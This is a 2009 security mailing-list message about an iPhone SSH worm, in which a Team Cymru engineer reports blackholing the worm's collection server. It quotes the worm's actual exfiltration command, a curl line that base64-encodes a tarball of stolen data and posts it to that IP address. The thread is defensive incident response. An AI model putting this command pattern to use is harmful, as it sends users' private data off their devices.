[nsp-sec] iPhone worm: Confirmed - possibly steals SMS messages.
Tim Wilde
twilde at cymru.com
Fri Nov 20 09:29:10 EST 2009
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On 11/20/2009 8:56 AM, Scott A. McIntyre wrote:
> However, it does grab other data and upload it:
>
> curl 92.61.38.16/xml/a.php?name=$ID --data "data=`base64 -w 0 ${ID}.tgz| sed -e 's/+/%plu/g'`"
>
> I've asked Team Cymru to blackhole that IP address, I've already done so here.
>
> AS | IP | AS Name
> 47205 | 92.61.38.16 | HOSTEX HOSTEX autonomous system
Hey Team,
The IP has been added to the DDoS-RS list, you can see its entry in
ddos-rsv2.txt:
# ASN | Description | IP | Prot | Port
| Added | Expires | Cat | S | W | Comments
47205 | HOSTEX HOSTEX autonomous system | 92.61.38.16 | tcp | 80
| 2009-11-20 13:39:15 | 2009-11-28 13:39:15 | botweb | 0 | 0 | iPhone
SSH Worm
And if you're peering with the DDoS-RS you should already be getting the
route.
Thanks,
Tim
- --
Tim Wilde, Senior Software Engineer, Team Cymru, Inc.
twilde at cymru.com | +1-630-230-5433 | http://www.team-cymru.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAksGp7YACgkQluRbRini9tgZygCeLrAqadvoM8RSIPRKrGMHInHp
DdcAninqJ+LCn3vdZEavXH07QRF9NcQs
=rNbW
-----END PGP SIGNATURE-----
More information about the nsp-security
mailing list